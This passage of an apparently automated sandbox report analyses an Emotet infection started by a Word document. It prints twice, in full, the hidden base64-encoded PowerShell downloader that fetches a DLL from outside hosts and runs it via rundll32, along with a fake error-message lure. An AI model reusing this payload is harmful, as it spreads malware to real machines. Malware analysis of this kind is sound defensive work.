63 57 30 ba 54 0c 1b 74 d3 02 21 06 5b 41 37 3f e1 1b 46 cf 40 b7 b6 53 a1 8d b9 34 43 53 ad 07 58 1a 85 67 41 74 cb 00 c7 88 9b a5 34 eb e0 e6 63 12 8e 73 21 4a 58 68 e3 59 de 97 c5 f2 ee 99 d5 2b f2 15 23 6e db d9 d5 7e 59 ff d3 ca 9c 6d 42 f7 fc 1b 75 56 39 4a 56 a0 09 d3 3b 35 62 f2 ab 37 b3 27 1e bb 60 79 49 c1 62 5f ce 84 55 14 54 85 51 ab 39 d5 31 89 f5 28 ec 1d bc b4 af 59 26 11 de 44 2a 25 f0 b2 2b 9b d3 46 bb 3f 3c c2 17 e7 56 88 51 5f a1 58 07 0c e6 8e 6f c0 52 7e 34 d9 6f 3a 9e a8 81 82 3a e5 f2 15 02 09 76 36 cb fc 49 b5 5e 92 21 24 78 7d ec fb f1 a4 62 4e 51 c1 6e b4 46 5b da 8c a2 1f 66 53 f2 ba 7b e6 4e 4c 1d 9d 00 dc f4 46 56 f4 d8 6c 7c f5 81 ed a8 52 39 0f d6 d3 93 dc be e3 3b 2a 60 7c ec 82 65 cf ee e9 86 94 80 7d ac c2 a5 d0 4e 43 df e5 b4 00 fd 95 41 2d 19 cc 9b 4a 1c a6 db 25 58 27 ff 60 50 c2 82 ec f9 0a 23 07 66 77 5e eb 26 c8 e8 63 79 1c 87 97 82 35 d7 2b ed 91 67 07 6f 3a 95 40 18 c1 23 15 9b 6f 9a 49 dd 57 f2 ec 30 1e 74 0a 18 c7 63 a0 97 14 94 b2 df ec 76 f5 44 50 ff 2c 7f e2 68 5a 04 3c 3b 30 b6 d7 86 6b cf ef e6 70 28 e1 79 96 4e 10 08 35 5c 5a 79 38 9f dc e1 e8 ef 97 52 e8 8c dc cd e6 6f 93 d4 11 9f ec 9f c7 b1 f6 5a 42 1b 78 fc b8 59 af 8a ad ed 3d ba 5a c6 74 d2 35 57 fe 04 66 00 98 a2 18 18 9f a5 11 12 e4 db 1c 3d c4 19 79 5c b5 a8 a8 08 74 76 dc ed ca 70 72 25 33 7a 0e c0 07 ac 94 f7 96 1d 13 dd a8 76 97 69 45 ae 46 3f ee 63 48 d9 6b a7 3a 72 23 17 00 0d bb dd 4d d9 61 7a a7 45 d7 b9 6e 42 bd 0e 8b f2 5e ef e5 0d 54 c9 58 63 2c 62 69 7b f1 1c b1 51 9e f7 74 e6 55 86 97 bf c5 1b 5f 56 01 9b 2a 80 d7 58 46 9a bb d6 b4 5a ef e3 2d b2 55 b5 c1 42 5b 60 b8 1c d4 4e cb 70 7c 11 2d 77 a1 71 95 bb cc 0d 5a 2f 10 32 d5 e6 c5 40 bb 13 45 d6 3b b6 cd 8d de db ba d9 5b 2c fb 8c 4b d9 af dc a0 84 03 d2 f0 9a 63 fa 4f 12 0f f6 82 6e 90 f0 b1 33 b9 5c 13 6e 29 38 6e 43 42 86 53 4a 5c 5c 2b 47 3a 2d 29 78 e2 6e e9 db 36 9b 72 0c bc b6 62 bd b0 a6 ac e9 5d 07 a7 b0 8e e8 56 e3 c5 29 27 c9 72 31 2a b4 d7 ee 09 5d 2e d3 a8 5d e5 6b 4b f4 5b b3 e8 4d 58 20 30 87 e2 0c cb 2b 98 93 d0 05 22 af d8 ac 33 b2 12 f4 9d df 92 00 2b b4 33 c0 5e 6a
                                                    Data Ascii: 884HCN%L+-f55 ~?K7yXncZersGJD]hlD|xpdCFFhJ4%6=5`k4K<L<*+DWW}2WcBAFR?5$60;nbVFJ?)nV!0JAiRqKpD92LJ\C0->B/Kq48ua1Cji+=]/I!=7f <SM;}#d]@R9`o~mf<q!cky3N?8@]67ge9~UILdI!8@{V LOcW0Tt![A7?F@S4CSXgAt4cs!JXhY+#n~YmBuV9JV;5b7'`yIb_UTQ91(Y&D*%+F?<VQ_XoR~4o::v6I^!$x}bNQnF[fS{NLFVl|R9;*`|e}NCA-J%X'`P#fw^&cy5+go:@#oIW0tcvDP,hZ<;0kp(yN5\Zy8RoZBxY=Zt5Wf=y\tvpr%3zviEF?cHk:r#MazEnB^TXc,bi{QtU_V*XFZ-UB[`Np|-wqZ/2@E;[,KcOn3\n)8nCBSJ\\+G:-)xn6rb]V)'r1*].]kK[MX 0+"3+3^j
                                                    Jan 6, 2021 08:37:13.743596077 CET232INData Raw: 0c 89 75 c8 2a 22 b6 82 99 a9 1d 33 4f 68 97 51 26 38 52 c4 4b ec e7 54 98 7e 8a 27 e5 f2 8d ff a8 fb 34 97 cf 03 9f 56 a3 c5 ec 22 4e e3 fb 76 7a 49 53 f5 6f 3a f8 65 bc 67 6b 63 a9 c0 5b 84 7b 74 d4 16 e3 9d 77 b3 e5 0b f6 61 85 11 45 bf 5b 25
                                                    Data Ascii: u*"3OhQ&8RKT~'4V"NvzISo:egkc[{twaE[%VJsHon1g%Ht3^~zOj$Z'x4;~npq"wpo}pQ=+7M,gfdSSW-W?Q6xKg54^8j


                                                    Code Manipulations

                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    Analysis Process: WINWORD.EXE PID: 2364 Parent PID: 584

                                                    General

                                                    Start time:08:36:38
                                                    Start date:06/01/2021
                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                    Imagebase:0x13fbb0000
                                                    File size:1424032 bytes
                                                    MD5 hash:95C38D04597050285A18F66039EDB456
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: cmd.exe PID: 684 Parent PID: 1220

                                                    General

                                                    Start time:08:36:40
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA
                                                    Imagebase:0x4a7e0000
                                                    File size:345088 bytes
                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    Chronological Activities

                                                    Analysis Process: msg.exe PID: 1276 Parent PID: 684

                                                    General

                                                    Start time:08:36:40
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\System32\msg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:msg user /v Word experienced an error trying to open the file.
                                                    Imagebase:0xff8a0000
                                                    File size:26112 bytes
                                                    MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    Chronological Activities

                                                    Analysis Process: powershell.exe PID: 2556 Parent PID: 684

                                                    General

                                                    Start time:08:36:41
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA
                                                    Imagebase:0x13f2d0000
                                                    File size:473600 bytes
                                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2104426345.0000000000356000.00000004.00000001.sdmp, Author: Florian Roth
                                                    • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2104546629.0000000001CC6000.00000004.00000001.sdmp, Author: Florian Roth
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: rundll32.exe PID: 2332 Parent PID: 2556

                                                    General

                                                    Start time:08:36:48
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\System32\rundll32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                                                    Imagebase:0xff5b0000
                                                    File size:45568 bytes
                                                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    Chronological Activities

                                                    Analysis Process: rundll32.exe PID: 2824 Parent PID: 2332

                                                    General

                                                    Start time:08:36:49
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                                                    Imagebase:0x860000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2106729405.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    Chronological Activities

                                                    Analysis Process: rundll32.exe PID: 2712 Parent PID: 2824

                                                    General

                                                    Start time:08:36:49
                                                    Start date:06/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Czsbnlmzhou\heljhxhmap.nib',Control_RunDLL
                                                    Imagebase:0x860000
                                                    File size:44544 bytes
